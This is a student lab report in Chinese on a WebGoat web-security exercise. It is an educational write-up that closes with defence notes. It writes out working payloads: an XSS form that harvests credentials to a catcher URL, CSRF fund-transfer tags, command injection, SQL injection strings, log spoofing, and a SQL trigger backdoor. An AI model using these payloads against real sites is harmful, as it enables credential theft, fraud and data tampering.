2017-2018-2 20155230《网络对抗技术》实验9：Web安全基础

实践过程记录

• 下载wegot并配置好java环境后

• 输入java -jar webgoat-container-7.0-SNAPSHOT-war-exec.jar
  
  

• 在浏览器输入localhost:8080/WebGoat，进入WebGoat开始实验
  
  

目录

• 1.Phishing with XSS （网路钓鱼）

• 2.Stored XSS Attacks

• 3.Reflected XSS Attacks

• 4.Cross Site Request Forgery(CSRF)

• 5.CSRF Prompt By-Pass

• 6.Command Injection

• 7.Numeric SQL Injection

• 8.Log Spoofing

• 9.String SQL Injection

• 10.Database Backdoors

XSS攻击

1.Phishing with XSS （网路钓鱼）

• 在搜索框中输入XSS攻击代码，利用XSS可以在已存在的页面中进一步添加元素的特点。我们先创建一个form，让受害人在我们创建的form中填写用户名和密码，再添加一段JavaScript代码，读取受害人输入的用户名和密码，完整的XSS攻击代码如下：

</form>
<script>
function hack(){
    XSSImage=new Image;
    XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
    alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
}
</script>
<form name="phish">
<br>
<br>
<HR>
<H2>This feature requires account login:</H2>
<br>
<br>Enter Username:<br>
<input type="text" name="user">
<br>Enter Password:<br>
<input type="password" name = "pass">
<br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>

• 在搜索框中输入攻击代码后点击搜索，会看到一个要求输入用户名密码的表单
  
  

• 输入用户名密码，点击登录，WebGoat会将你输入的信息捕获并反馈给你
  
  

2.Stored XSS Attacks

• 创建非法的消息内容，可以导致其他用户访问时载入非预期的页面或内容，输入标题，然后在message中输入一串代码，比如

<script>alert("20155230 attack succeed!");</script>

• 提交后，再次点击刚刚创建的帖子，成功弹出窗口，说明攻击成功
  
  

3.Reflected XSS Attacks

• 反射型XSS，非持久化，需要欺骗用户自己去点击链接才能触发XSS代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面。

• 我们将带有攻击性的URL作为输入源，例如依旧输入<script>alert("20155230 attack succeed!");</script>，就会弹出对话框
  
  

CSRF攻击

4.Cross Site Request Forgery(CSRF)

• 查看页面右边Parameters中的src和menu值。
  
  

• 我们在message框中输入这样一串代码<img src='attack?Screen=src值&menu=menu值&transferFunds=转账数额' width='1' height='1'>
  
  

• 显示攻击成功

5.CSRF Prompt By-Pass

• message框中输入代码，转走金额5230

<iframe src="attack?Screen=src值&menu=menu值&transferFunds=转账数额"> </iframe>
<iframe src="attack?Screen=src值&menu=menu值&transferFunds=CONFIRM"> </iframe>

• 转出成功
  
  

Sql注入攻击

6.Command Injection

• 这个题是要求能够在目标主机上执行系统命令，我们可以通过火狐浏览器下的一个扩展Firebug（就是右上角的小虫的标志）对源代码进行修改，若无Firebug，可在火狐浏览器添加工具中下载、安装、添加。例如在BackDoors.help旁边加上"& netstat -an & ipconfig"
  
  

• 选中修改后的值再点view，可以看到命令被执行，出现系统网络连接情况：
  
  

7.Numeric SQL Injection

• 通过注入SQL字符串的方式查看所有的天气数据，加上一个1=1这种永真式即可达到我们的目的，利用firebug，在任意一个值比如101旁边加上or 1=1
  
  

• 选中Columbia，点Go，可以看到所有天气数据：
  
  

8.Log Spoofing

• 我们输入的用户名会被追加到日志文件中，所以我们可以使用障眼法来使用户名为admin的用户在日志中显示“成功登录”，在User Name文本框中输入20155230%0d%0aLogin Succeeded for username: admin，其中%0d是回车，%0a是换行符：
  
  

• 攻击成功

9.String SQL Injection

• 构造SQL注入字符串，在文本框中输入' or 1=1 --：

• 点击GO，可以查看到所以信息：
  
  

10.Database Backdoors

• 先输一个101，得到了该用户的信息：
  
  

• 可以发现输入的语句没有验证，很容易进行SQL注入，输入注入语句： 101; update employee set salary=5230 ，成功把该用户的工调整到了5230
  
  

• 接下来使用语句 101;CREATE TRIGGER lxBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='12345678@qq.com' WHERE userid = NEW.userid 创建一个后门，把表中所有的邮箱和用户ID都改写：
  
  

---

实验后回答问题

• SQL注入攻击原理，如何防御

  • SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意SQL命令的目的。
  • 防御措施
    • 普通用户与系统管理员用户的权限要有严格的区分。
    • 强迫使用参数化语句。
    • 加强对用户输入的验证。

• XSS攻击的原理，如何防御

  • XSS攻击是Web攻击中最常见的攻击方法之一，它是通过对网页注入可执行代码且成功地被浏览器
    
    执行，达到攻击的目的，形成了一次有效XSS攻击，一旦攻击成功，它可以获取用户的联系人列
    
    表，然后向联系人发送虚假诈骗信息，可以删除用户的日志等等。
  • 防御措施
    • 过滤用户输入的检查用户输入的内容中是否有非法内容。如<>（尖括号）、”（引号）、 ‘（单引号）、%（百分比符号）、;（分号）、()（括号）、&（& 符号）、+（加号）等。严格控制输出

• CSRF攻击原理，如何防御

  • 跨站请求伪造，盗用身份发送恶意请求。
  • 防御措施
    • 验证 HTTP Referer 字段
    • 在请求地址中添加 token 并验证

---

实验总结与体会

• 学习到了很多攻击类型，更加深入的了解很多。但是这个软件是英文版本，用起来挺费劲的。

• 在学习sql注入时看源码看的怀疑人生，字是真的有点小，还不知道怎么放大。。。但是在看代码的同时也算是复习了上学期的Web知识。也深深领会到了代码质量的重要性。对XSS和CRSF也有了一定的认识！